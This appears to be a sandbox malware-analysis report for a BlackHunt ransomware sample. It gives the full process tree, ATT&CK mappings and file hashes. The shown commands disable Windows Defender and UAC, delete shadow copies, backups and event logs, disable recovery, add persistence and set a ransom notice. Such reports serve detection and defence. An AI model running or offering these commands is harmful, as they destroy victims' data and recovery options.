description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe"C:\Users\Admin\AppData\Local\Temp\a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1640 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:2916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2708
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2732
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2576
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2700
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1472
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2932
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2992
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe" /F2⤵PID:2956
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe" /F3⤵
- Creates scheduled task(s)
PID:1592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1020
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2188
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1116
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1052
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1100
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2360
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2420
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:668
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:380
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2556
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2304
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1872
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2620
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2864
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2300
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2900
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2856
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:3048
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2704
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2848
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2308
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2504
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2236
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1556
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1572
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1644
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:856
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1944
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1564
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1424
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1600
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:328
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵PID:3044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:3012
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:1888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:1756
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:1908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:1764
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:2716
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:2412
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2708
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3052
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1700
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:1684
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:2668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:1912
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:2680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:2772
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:1092
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3004
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2484
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:772
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2884
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1848
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:1972
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:476
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:2992
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:856
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:2336
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\a2b6bcbbc42809422038e7bd7d35988733cbaffcd0f0e0e4b6dc514328087571.exe"2⤵
- Deletes itself
PID:1468 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:1224
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:2936
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:2084
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:1768
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:1216
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵PID:1776
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:1224
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:2652
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:2596
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:2588
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:3000
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:3064
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:2016
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2916
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2300
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:1404
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:2984
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1356
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F1⤵PID:568
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f1⤵PID:2544
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:800
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:1192
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2748
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2848
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
684B
MD543fedd3abcd836a1db5d684b7d7fbcba
SHA1c36543c939101754988d51eba7abce31a57621ad
SHA2566e65aa54067968ab84f4ec3f7f0dcf553c9531611e69735fae3af2184d1e7247
SHA512656c08d8aef824b2b9dd088fc37b9f0a7cfb558fe29d52c94a036defc5aa568b574543d434eac25bb6d9da9537b02e9843ef38434ba1ee60d029d97b7cf09c44
-
Filesize
1KB
MD5b374b32f6b77719de9de63b1dac06701
SHA1abc4b5edf26dd32881ba17c2c606ea6492f1a724
SHA256fcc460b17c7f5e510af98abb0c41919de97bf3c3ca1420dc4463f9bde7528b43
SHA5128b41ebda8140324e7d491775ba1ab62e081bc4493681f50cf0459da4183159dc8c6fa754c3016db6dcb11f74c68207b5dd08632579faa9a0d372e22e6bf981cc
-
Filesize
12KB
MD50abecbd0bfe3b24acdacb527708133f9
SHA144dd4712f4cf74079453ef14c3a386ed68110d5f
SHA2567b8768ad8f2ce67c80ea310c85ac5be806de6f3265c6277e31a159c7b7baaca1
SHA5125b954bba331cfa6ba4ede8fc0db279d45785a8812ec2cf25d4342e5ed2b6e670a8fa3c00d420b2f82b9d6d888a01c313bf46971421ca4caf1846121e7c78ece6